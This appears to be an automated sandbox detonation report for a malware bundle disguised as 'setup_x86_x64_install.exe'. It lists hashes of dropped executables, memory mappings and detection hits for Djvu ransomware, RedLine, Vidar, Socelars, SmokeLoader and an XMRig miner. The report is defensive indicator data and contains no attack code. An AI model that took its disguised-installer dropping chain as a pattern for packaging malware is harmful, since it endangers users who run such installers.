SHA512 9578fc34807be2541aa7dc26acbe27211e96b42c6c4208afe195b19b08264dfeb3ea7fec637c759f062cbd5561c5140ecd68cd5c79efbb844d3b2639e336ca0c

\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19e6a852f849bb2.exe

MD5 ec2b5ec434be3587aa4075d30c2dc958
SHA1 fb215d328a6ceb20abc5c94c4bce4077209f5c2e
SHA256 521232ff78199868ecf5e6033b4f6d9c9958d9361245ce44b967af335cc328e6
SHA512 bf0a41ef79e32da0ecfcc71807f7d39be4e03751fa7b5ac4cbd3ea43483664a28329de2df68a0b040c2debd3888fe2fcaa5e732ab68a0fbb1e4648b3ddc008be

\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19c6762a08beae.exe

MD5 23474a72ab57624617ef5e251e99e4fe
SHA1 59a064a4ccaca8c5cdfd09fe078a7ad2cd9bc6db
SHA256 1ffe2a570e92529fa0944f786b82e3e75fec9c1633578e08cbe0a4c7e337e4f2
SHA512 cf869701e81688ee57f321280adf8bba27766797e298332cf2becbb1d2453ab96900d56bb6a831cb531b95dddd34b59133a880c399cc78488ae8c196738ffd33

\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19c6762a08beae.exe

MD5 23474a72ab57624617ef5e251e99e4fe
SHA1 59a064a4ccaca8c5cdfd09fe078a7ad2cd9bc6db
SHA256 1ffe2a570e92529fa0944f786b82e3e75fec9c1633578e08cbe0a4c7e337e4f2
SHA512 cf869701e81688ee57f321280adf8bba27766797e298332cf2becbb1d2453ab96900d56bb6a831cb531b95dddd34b59133a880c399cc78488ae8c196738ffd33

\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe

MD5 f1e2bb0a62bf371a71b62224b18a69b8
SHA1 872738f6cac0e95a4a0625f9d6b6788cf0dbdfa2
SHA256 aec3efab3db88776950250c0bdc2a3be0e8fdb9c07fbcef83549bfa3bedc34ab
SHA512 ce257f0686c9552759f3d06d8218ac4c5c16350fb673843f06d188aeb8bb531fcf7f29a61c60ef52944e6f72ccfe91adff993c791959585c2fe7f1a1c1fe88f6

\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe

MD5 f1e2bb0a62bf371a71b62224b18a69b8
SHA1 872738f6cac0e95a4a0625f9d6b6788cf0dbdfa2
SHA256 aec3efab3db88776950250c0bdc2a3be0e8fdb9c07fbcef83549bfa3bedc34ab
SHA512 ce257f0686c9552759f3d06d8218ac4c5c16350fb673843f06d188aeb8bb531fcf7f29a61c60ef52944e6f72ccfe91adff993c791959585c2fe7f1a1c1fe88f6

\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19ba05e89ea6d406.exe

MD5 b160ce13f27f1e016b7bfc7a015f686b
SHA1 bfb714891d12ffd43875e72908d8b9f4f576ad6e
SHA256 fac205247d3b19b5f82f5f4d1269a5c047b6c9ad9f21cc51b4b782c2b08a3b87
SHA512 9578fc34807be2541aa7dc26acbe27211e96b42c6c4208afe195b19b08264dfeb3ea7fec637c759f062cbd5561c5140ecd68cd5c79efbb844d3b2639e336ca0c

\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19ba05e89ea6d406.exe

MD5 b160ce13f27f1e016b7bfc7a015f686b
SHA1 bfb714891d12ffd43875e72908d8b9f4f576ad6e
SHA256 fac205247d3b19b5f82f5f4d1269a5c047b6c9ad9f21cc51b4b782c2b08a3b87
SHA512 9578fc34807be2541aa7dc26acbe27211e96b42c6c4208afe195b19b08264dfeb3ea7fec637c759f062cbd5561c5140ecd68cd5c79efbb844d3b2639e336ca0c

C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19c6762a08beae.exe

MD5 23474a72ab57624617ef5e251e99e4fe
SHA1 59a064a4ccaca8c5cdfd09fe078a7ad2cd9bc6db
SHA256 1ffe2a570e92529fa0944f786b82e3e75fec9c1633578e08cbe0a4c7e337e4f2
SHA512 cf869701e81688ee57f321280adf8bba27766797e298332cf2becbb1d2453ab96900d56bb6a831cb531b95dddd34b59133a880c399cc78488ae8c196738ffd33

C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19f84b58b3d7.exe

MD5 6f4e3451cd8c385c87fd76feab15bb6e
SHA1 861c46d7211a572b756df462eec43c58aeec85f4
SHA256 21103f8445399fb1b3a5fe665cfd221d38066b09fa1e2a2d2ca59c09db95052a
SHA512 d5cd2e08dd7edd58702ddc17bf68fa721e7c00b00b5f136b7134c4e38820cbca329cdff96fcb616879845689e279c725329b7de23a2fb833ed5808f3b819132e

\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19c6762a08beae.exe

MD5 23474a72ab57624617ef5e251e99e4fe
SHA1 59a064a4ccaca8c5cdfd09fe078a7ad2cd9bc6db
SHA256 1ffe2a570e92529fa0944f786b82e3e75fec9c1633578e08cbe0a4c7e337e4f2
SHA512 cf869701e81688ee57f321280adf8bba27766797e298332cf2becbb1d2453ab96900d56bb6a831cb531b95dddd34b59133a880c399cc78488ae8c196738ffd33

memory/2084-154-0x0000000000000000-mapping.dmp

memory/1204-155-0x0000000000B40000-0x0000000000B41000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19e6a852f849bb2.exe

MD5 ec2b5ec434be3587aa4075d30c2dc958
SHA1 fb215d328a6ceb20abc5c94c4bce4077209f5c2e
SHA256 521232ff78199868ecf5e6033b4f6d9c9958d9361245ce44b967af335cc328e6
SHA512 bf0a41ef79e32da0ecfcc71807f7d39be4e03751fa7b5ac4cbd3ea43483664a28329de2df68a0b040c2debd3888fe2fcaa5e732ab68a0fbb1e4648b3ddc008be

\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19e6a852f849bb2.exe

MD5 ec2b5ec434be3587aa4075d30c2dc958
SHA1 fb215d328a6ceb20abc5c94c4bce4077209f5c2e
SHA256 521232ff78199868ecf5e6033b4f6d9c9958d9361245ce44b967af335cc328e6
SHA512 bf0a41ef79e32da0ecfcc71807f7d39be4e03751fa7b5ac4cbd3ea43483664a28329de2df68a0b040c2debd3888fe2fcaa5e732ab68a0fbb1e4648b3ddc008be

\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19e6a852f849bb2.exe

MD5 ec2b5ec434be3587aa4075d30c2dc958
SHA1 fb215d328a6ceb20abc5c94c4bce4077209f5c2e
SHA256 521232ff78199868ecf5e6033b4f6d9c9958d9361245ce44b967af335cc328e6
SHA512 bf0a41ef79e32da0ecfcc71807f7d39be4e03751fa7b5ac4cbd3ea43483664a28329de2df68a0b040c2debd3888fe2fcaa5e732ab68a0fbb1e4648b3ddc008be

\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19e6a852f849bb2.exe

MD5 ec2b5ec434be3587aa4075d30c2dc958
SHA1 fb215d328a6ceb20abc5c94c4bce4077209f5c2e
SHA256 521232ff78199868ecf5e6033b4f6d9c9958d9361245ce44b967af335cc328e6
SHA512 bf0a41ef79e32da0ecfcc71807f7d39be4e03751fa7b5ac4cbd3ea43483664a28329de2df68a0b040c2debd3888fe2fcaa5e732ab68a0fbb1e4648b3ddc008be

memory/1612-160-0x0000000000890000-0x0000000000891000-memory.dmp

memory/1224-163-0x0000000000400000-0x000000000046D000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19c6762a08beae.exe

MD5 23474a72ab57624617ef5e251e99e4fe
SHA1 59a064a4ccaca8c5cdfd09fe078a7ad2cd9bc6db
SHA256 1ffe2a570e92529fa0944f786b82e3e75fec9c1633578e08cbe0a4c7e337e4f2
SHA512 cf869701e81688ee57f321280adf8bba27766797e298332cf2becbb1d2453ab96900d56bb6a831cb531b95dddd34b59133a880c399cc78488ae8c196738ffd33

\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19ba05e89ea6d406.exe

MD5 b160ce13f27f1e016b7bfc7a015f686b
SHA1 bfb714891d12ffd43875e72908d8b9f4f576ad6e
SHA256 fac205247d3b19b5f82f5f4d1269a5c047b6c9ad9f21cc51b4b782c2b08a3b87
SHA512 9578fc34807be2541aa7dc26acbe27211e96b42c6c4208afe195b19b08264dfeb3ea7fec637c759f062cbd5561c5140ecd68cd5c79efbb844d3b2639e336ca0c

memory/1204-132-0x0000000000000000-mapping.dmp

memory/2232-165-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\is-NRU1I.tmp\Sat19ba05e89ea6d406.tmp

MD5 6020849fbca45bc0c69d4d4a0f4b62e7
SHA1 5be83881ec871c4b90b4bf6bb75ab8d50dbfefe9
SHA256 c6c796f0d37e1a80632a295122db834499017b8d07728e0b5dfa6325ed3cab98
SHA512 f4c359a9ebf362b943d10772efe9cfd0a0153c1ff866ffdf1223e16e544dfa2250f67e7a7682d2558761d36efe15c7de1a2c311bc67b162eb77394ef179924eb

\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19f84b58b3d7.exe

MD5 6f4e3451cd8c385c87fd76feab15bb6e
SHA1 861c46d7211a572b756df462eec43c58aeec85f4
SHA256 21103f8445399fb1b3a5fe665cfd221d38066b09fa1e2a2d2ca59c09db95052a
SHA512 d5cd2e08dd7edd58702ddc17bf68fa721e7c00b00b5f136b7134c4e38820cbca329cdff96fcb616879845689e279c725329b7de23a2fb833ed5808f3b819132e

C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe

MD5 f1e2bb0a62bf371a71b62224b18a69b8
SHA1 872738f6cac0e95a4a0625f9d6b6788cf0dbdfa2
SHA256 aec3efab3db88776950250c0bdc2a3be0e8fdb9c07fbcef83549bfa3bedc34ab
SHA512 ce257f0686c9552759f3d06d8218ac4c5c16350fb673843f06d188aeb8bb531fcf7f29a61c60ef52944e6f72ccfe91adff993c791959585c2fe7f1a1c1fe88f6

C:\Users\Admin\AppData\Local\Temp\is-NRU1I.tmp\Sat19ba05e89ea6d406.tmp

MD5 6020849fbca45bc0c69d4d4a0f4b62e7
SHA1 5be83881ec871c4b90b4bf6bb75ab8d50dbfefe9
SHA256 c6c796f0d37e1a80632a295122db834499017b8d07728e0b5dfa6325ed3cab98
SHA512 f4c359a9ebf362b943d10772efe9cfd0a0153c1ff866ffdf1223e16e544dfa2250f67e7a7682d2558761d36efe15c7de1a2c311bc67b162eb77394ef179924eb

\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe

MD5 f1e2bb0a62bf371a71b62224b18a69b8
SHA1 872738f6cac0e95a4a0625f9d6b6788cf0dbdfa2
SHA256 aec3efab3db88776950250c0bdc2a3be0e8fdb9c07fbcef83549bfa3bedc34ab
SHA512 ce257f0686c9552759f3d06d8218ac4c5c16350fb673843f06d188aeb8bb531fcf7f29a61c60ef52944e6f72ccfe91adff993c791959585c2fe7f1a1c1fe88f6

\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat199ba8a4637dcb034.exe

MD5 5af7bc821a1501b38c4b153fa0f5dade
SHA1 467635cce64ae4e3ce41d1819d2ec6abdf5414f3
SHA256 773f2e6660cc3a2b3bb55c0b88a74d24db0dfc5c0cef7c5b13ec9aac48f5d6b6
SHA512 53fd58565d6ca16fc9ca7113cd90657ef8c09fa2efcc9603f6da5c2a3050aaeb1d8edfc46b2b40d80b44a8ccce27d9e4fc6bac62bac236fdc360ebdab3b5c146

C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat191649b47c9e2.exe

MD5 b904fb528fafefae5c59553a8c31291d
SHA1 0dc01712e88d5bb47cc8fb02678eb46466cc2442
SHA256 717b0790a5cc5b577fb2535effc00fb58a3d62e55537a3d3ae0bf6639e8c9474
SHA512 5a795d4bde04e489e688899937708bd6910d2a36d2b50397fca91590bb6e74921102cf1e4a52405488c6c4aeba92565794470007d6bb1e2f029d17d2095fa1ac

C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19c6762a08beae.exe

MD5 23474a72ab57624617ef5e251e99e4fe
SHA1 59a064a4ccaca8c5cdfd09fe078a7ad2cd9bc6db
SHA256 1ffe2a570e92529fa0944f786b82e3e75fec9c1633578e08cbe0a4c7e337e4f2
SHA512 cf869701e81688ee57f321280adf8bba27766797e298332cf2becbb1d2453ab96900d56bb6a831cb531b95dddd34b59133a880c399cc78488ae8c196738ffd33

memory/1936-122-0x0000000000000000-mapping.dmp

memory/1612-117-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat191649b47c9e2.exe

MD5 b904fb528fafefae5c59553a8c31291d
SHA1 0dc01712e88d5bb47cc8fb02678eb46466cc2442
SHA256 717b0790a5cc5b577fb2535effc00fb58a3d62e55537a3d3ae0bf6639e8c9474
SHA512 5a795d4bde04e489e688899937708bd6910d2a36d2b50397fca91590bb6e74921102cf1e4a52405488c6c4aeba92565794470007d6bb1e2f029d17d2095fa1ac

C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19f84b58b3d7.exe

MD5 6f4e3451cd8c385c87fd76feab15bb6e
SHA1 861c46d7211a572b756df462eec43c58aeec85f4
SHA256 21103f8445399fb1b3a5fe665cfd221d38066b09fa1e2a2d2ca59c09db95052a
SHA512 d5cd2e08dd7edd58702ddc17bf68fa721e7c00b00b5f136b7134c4e38820cbca329cdff96fcb616879845689e279c725329b7de23a2fb833ed5808f3b819132e

C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19ba05e89ea6d406.exe

MD5 b160ce13f27f1e016b7bfc7a015f686b
SHA1 bfb714891d12ffd43875e72908d8b9f4f576ad6e
SHA256 fac205247d3b19b5f82f5f4d1269a5c047b6c9ad9f21cc51b4b782c2b08a3b87
SHA512 9578fc34807be2541aa7dc26acbe27211e96b42c6c4208afe195b19b08264dfeb3ea7fec637c759f062cbd5561c5140ecd68cd5c79efbb844d3b2639e336ca0c

memory/1092-112-0x0000000000000000-mapping.dmp

memory/620-107-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19e4750dd01.exe

MD5 3a9115aa34ddc3302fe3d07ceddd4373
SHA1 10e7f2a8c421c825a2467d488b33de09c2c2a14b
SHA256 080060800d33d4fa01099647797195995af436cbad0a5dc903a572b184b50634
SHA512 85fa6eddbaec2df843d623ddf88154cd2b62b9823c953b5659dc0464e1a47b90a877ca3681007561d2e1ccdd315e4f79ecf0285404868cc7cedd369ae28a586a

memory/2232-169-0x00000000003E0000-0x00000000003E1000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-VQ6S5.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-VQ6S5.tmp\idp.dll

MD5 8f995688085bced38ba7795f60a5e1d3
SHA1 5b1ad67a149c05c50d6e388527af5c8a0af4343a
SHA256 203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
SHA512 043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

\Users\Admin\AppData\Local\Temp\is-VQ6S5.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\is-NRU1I.tmp\Sat19ba05e89ea6d406.tmp

MD5 6020849fbca45bc0c69d4d4a0f4b62e7
SHA1 5be83881ec871c4b90b4bf6bb75ab8d50dbfefe9
SHA256 c6c796f0d37e1a80632a295122db834499017b8d07728e0b5dfa6325ed3cab98
SHA512 f4c359a9ebf362b943d10772efe9cfd0a0153c1ff866ffdf1223e16e544dfa2250f67e7a7682d2558761d36efe15c7de1a2c311bc67b162eb77394ef179924eb

memory/1872-110-0x0000000000000000-mapping.dmp

memory/620-106-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/620-105-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/620-104-0x0000000064940000-0x0000000064959000-memory.dmp

memory/620-103-0x0000000064940000-0x0000000064959000-memory.dmp

memory/620-102-0x0000000064940000-0x0000000064959000-memory.dmp

memory/620-101-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1020-98-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat199ba8a4637dcb034.exe

MD5 5af7bc821a1501b38c4b153fa0f5dade
SHA1 467635cce64ae4e3ce41d1819d2ec6abdf5414f3
SHA256 773f2e6660cc3a2b3bb55c0b88a74d24db0dfc5c0cef7c5b13ec9aac48f5d6b6
SHA512 53fd58565d6ca16fc9ca7113cd90657ef8c09fa2efcc9603f6da5c2a3050aaeb1d8edfc46b2b40d80b44a8ccce27d9e4fc6bac62bac236fdc360ebdab3b5c146

memory/1464-96-0x0000000000000000-mapping.dmp

memory/1344-88-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat191649b47c9e2.exe

MD5 b904fb528fafefae5c59553a8c31291d
SHA1 0dc01712e88d5bb47cc8fb02678eb46466cc2442
SHA256 717b0790a5cc5b577fb2535effc00fb58a3d62e55537a3d3ae0bf6639e8c9474
SHA512 5a795d4bde04e489e688899937708bd6910d2a36d2b50397fca91590bb6e74921102cf1e4a52405488c6c4aeba92565794470007d6bb1e2f029d17d2095fa1ac

memory/1648-85-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe

MD5 f1e2bb0a62bf371a71b62224b18a69b8
SHA1 872738f6cac0e95a4a0625f9d6b6788cf0dbdfa2
SHA256 aec3efab3db88776950250c0bdc2a3be0e8fdb9c07fbcef83549bfa3bedc34ab
SHA512 ce257f0686c9552759f3d06d8218ac4c5c16350fb673843f06d188aeb8bb531fcf7f29a61c60ef52944e6f72ccfe91adff993c791959585c2fe7f1a1c1fe88f6

memory/1464-173-0x0000000002250000-0x0000000002E9A000-memory.dmp

memory/1480-175-0x0000000000400000-0x0000000001788000-memory.dmp

memory/1480-174-0x0000000000240000-0x0000000000249000-memory.dmp

memory/1612-176-0x0000000000150000-0x0000000000151000-memory.dmp

memory/2084-177-0x0000000001800000-0x00000000018D1000-memory.dmp

memory/1612-178-0x0000000000370000-0x000000000038B000-memory.dmp

memory/1612-179-0x0000000000160000-0x0000000000161000-memory.dmp

memory/2084-180-0x0000000000400000-0x00000000017F2000-memory.dmp

memory/1612-183-0x000000001AFC0000-0x000000001AFC2000-memory.dmp

memory/1296-182-0x0000000002BE0000-0x0000000002BF5000-memory.dmp

memory/1204-181-0x000000001B020000-0x000000001B022000-memory.dmp

memory/2676-184-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 d75734d85b59bdb7202e3c4b9def3631
SHA1 e6f713d88cce2df494095342e6734ea3cf59df0d
SHA256 600df54efe0bcdd1b2c7c8de1b821ff20d7ccc702479793324fc93ca7fd7a91c
SHA512 270b14765e24afacf7328fa409b59d5102bdd13d18968845796eb31e487f45118d34244c2c1f737c539ba612fd0dba0d1d08488debe2b7859f2d4b3d45810311

memory/2716-187-0x0000000000000000-mapping.dmp

memory/2676-188-0x0000000000180000-0x0000000000181000-memory.dmp

memory/2748-189-0x0000000000000000-mapping.dmp

memory/2716-191-0x0000000000C90000-0x0000000000C91000-memory.dmp

memory/2748-193-0x0000000000C60000-0x0000000000C62000-memory.dmp

memory/2716-194-0x0000000000260000-0x000000000027E000-memory.dmp

memory/2840-195-0x0000000000000000-mapping.dmp

memory/2840-197-0x00000000002C0000-0x00000000002C1000-memory.dmp

memory/2892-199-0x0000000000000000-mapping.dmp

memory/2716-201-0x000000001AF10000-0x000000001AF12000-memory.dmp

memory/2892-202-0x0000000000020000-0x0000000000021000-memory.dmp

memory/2840-203-0x0000000000360000-0x0000000000364000-memory.dmp

memory/2996-204-0x0000000000000000-mapping.dmp

memory/3020-206-0x0000000000000000-mapping.dmp

memory/1060-210-0x0000000000000000-mapping.dmp

memory/3036-207-0x0000000000000000-mapping.dmp

memory/3036-209-0x000000013F470000-0x000000013F471000-memory.dmp

memory/2892-213-0x0000000004AA0000-0x0000000004AA1000-memory.dmp

memory/3020-214-0x0000000000FF0000-0x0000000000FF1000-memory.dmp

memory/1064-217-0x0000000000000000-mapping.dmp

memory/600-216-0x0000000000000000-mapping.dmp

memory/3020-219-0x00000000002C0000-0x00000000002DB000-memory.dmp

memory/1292-220-0x0000000000000000-mapping.dmp

memory/1292-224-0x0000000000010000-0x0000000000011000-memory.dmp

memory/1064-223-0x00000000000D0000-0x00000000000D1000-memory.dmp

memory/600-221-0x0000000000CB0000-0x0000000000CB1000-memory.dmp

memory/600-227-0x00000000001D0000-0x00000000001D1000-memory.dmp

memory/1292-230-0x000000001ADA0000-0x000000001ADA2000-memory.dmp

memory/600-229-0x00000000001E0000-0x00000000001FB000-memory.dmp

memory/600-231-0x0000000000370000-0x0000000000371000-memory.dmp

memory/2420-232-0x0000000000000000-mapping.dmp

memory/600-234-0x000000001AE20000-0x000000001AE22000-memory.dmp

memory/908-236-0x0000000000000000-mapping.dmp

memory/1064-237-0x0000000004C20000-0x0000000004C21000-memory.dmp

memory/3020-235-0x0000000004A50000-0x0000000004A51000-memory.dmp

memory/2392-239-0x0000000000000000-mapping.dmp

memory/2892-240-0x00000000004A0000-0x00000000004B8000-memory.dmp

memory/1868-242-0x0000000000000000-mapping.dmp

memory/2384-244-0x0000000000000000-mapping.dmp

memory/2692-247-0x000000000041C5E2-mapping.dmp

memory/2788-249-0x0000000000000000-mapping.dmp

memory/2572-251-0x0000000000000000-mapping.dmp

memory/1872-254-0x0000000000000000-mapping.dmp

memory/1444-258-0x0000000000000000-mapping.dmp

memory/2064-259-0x0000000000000000-mapping.dmp

memory/1704-263-0x0000000000000000-mapping.dmp

memory/2384-265-0x0000000000390000-0x0000000000391000-memory.dmp

memory/2212-267-0x0000000000000000-mapping.dmp

memory/2868-269-0x0000000000000000-mapping.dmp

memory/2572-273-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1868-274-0x0000000000240000-0x000000000026F000-memory.dmp

memory/1532-275-0x0000000000000000-mapping.dmp

memory/2884-277-0x0000000000000000-mapping.dmp

memory/3032-281-0x0000000000000000-mapping.dmp

memory/2884-280-0x0000000000260000-0x0000000000261000-memory.dmp

memory/652-283-0x0000000000000000-mapping.dmp

memory/2588-287-0x0000000000000000-mapping.dmp

memory/1888-286-0x0000000000000000-mapping.dmp

memory/3032-290-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1868-291-0x0000000000400000-0x0000000002B5D000-memory.dmp

memory/2248-292-0x0000000000000000-mapping.dmp

memory/2248-294-0x0000000000260000-0x0000000000261000-memory.dmp

memory/2064-298-0x0000000000960000-0x0000000000961000-memory.dmp

memory/2788-300-0x00000000003D0000-0x0000000000400000-memory.dmp

memory/1532-305-0x0000000004B80000-0x0000000004B81000-memory.dmp

memory/2060-306-0x0000000000000000-mapping.dmp

memory/1380-308-0x000000000041C5EE-mapping.dmp

memory/2788-307-0x0000000000400000-0x0000000002B6D000-memory.dmp

memory/2788-309-0x0000000007011000-0x0000000007012000-memory.dmp

memory/1616-315-0x0000000000000000-mapping.dmp

memory/2776-314-0x0000000000000000-mapping.dmp

memory/1540-317-0x0000000000000000-mapping.dmp

memory/1888-321-0x0000000004AC0000-0x0000000004AC1000-memory.dmp

memory/1380-322-0x0000000004BD0000-0x0000000004BD1000-memory.dmp

memory/2692-323-0x0000000004AF0000-0x0000000004AF1000-memory.dmp

memory/2788-325-0x0000000007012000-0x0000000007013000-memory.dmp

memory/2788-326-0x0000000007013000-0x0000000007014000-memory.dmp

memory/2788-327-0x0000000007014000-0x0000000007016000-memory.dmp

memory/2392-328-0x0000000000380000-0x0000000000381000-memory.dmp

memory/2524-329-0x0000000000000000-mapping.dmp

memory/1616-331-0x00000000004C0000-0x0000000000504000-memory.dmp

memory/2524-333-0x0000000000400000-0x0000000000416000-memory.dmp

memory/1540-334-0x0000000001E60000-0x0000000001E61000-memory.dmp

memory/2040-335-0x0000000000000000-mapping.dmp

memory/2604-336-0x0000000000000000-mapping.dmp

memory/2040-338-0x0000000000B10000-0x0000000000B12000-memory.dmp

memory/2604-340-0x0000000000260000-0x0000000000261000-memory.dmp

memory/2272-339-0x0000000000000000-mapping.dmp

memory/3084-342-0x0000000000000000-mapping.dmp

memory/2272-343-0x0000000000510000-0x0000000000512000-memory.dmp

memory/3084-344-0x0000000000630000-0x0000000000632000-memory.dmp

memory/3036-348-0x000000001CB60000-0x000000001CB62000-memory.dmp

memory/3368-359-0x0000000002B70000-0x0000000002BB8000-memory.dmp

memory/3368-362-0x0000000000400000-0x0000000002B6B000-memory.dmp

memory/4044-368-0x0000000000170000-0x0000000000171000-memory.dmp

memory/4044-370-0x0000000003330000-0x00000000033E6000-memory.dmp

memory/4044-369-0x00000000031E0000-0x000000000332B000-memory.dmp

memory/3632-374-0x000000001C7C0000-0x000000001C7C2000-memory.dmp

memory/3376-379-0x0000000002550000-0x0000000002552000-memory.dmp

memory/2464-380-0x0000000000170000-0x0000000000171000-memory.dmp

memory/2464-382-0x00000000031F0000-0x00000000032A6000-memory.dmp

memory/3656-384-0x00000000001C0000-0x00000000001C1000-memory.dmp

memory/3656-385-0x00000000031C0000-0x0000000003276000-memory.dmp

memory/3592-387-0x0000000000C30000-0x0000000000C73000-memory.dmp

memory/2868-391-0x0000000005040000-0x0000000005041000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2021-09-11 20:41

Reported

2021-09-11 21:12

Platform

win7v20210408

Max time kernel

18s

Max time network

1837s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"

Signatures

Djvu Ransomware

ransomware djvu

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

RedLine

infostealer redline

RedLine Payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Socelars

stealer socelars

Socelars Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar

stealer vidar

rl_trojan

stealer
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

XMRig Miner Payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat1946eb84e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat1946eb84e6.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
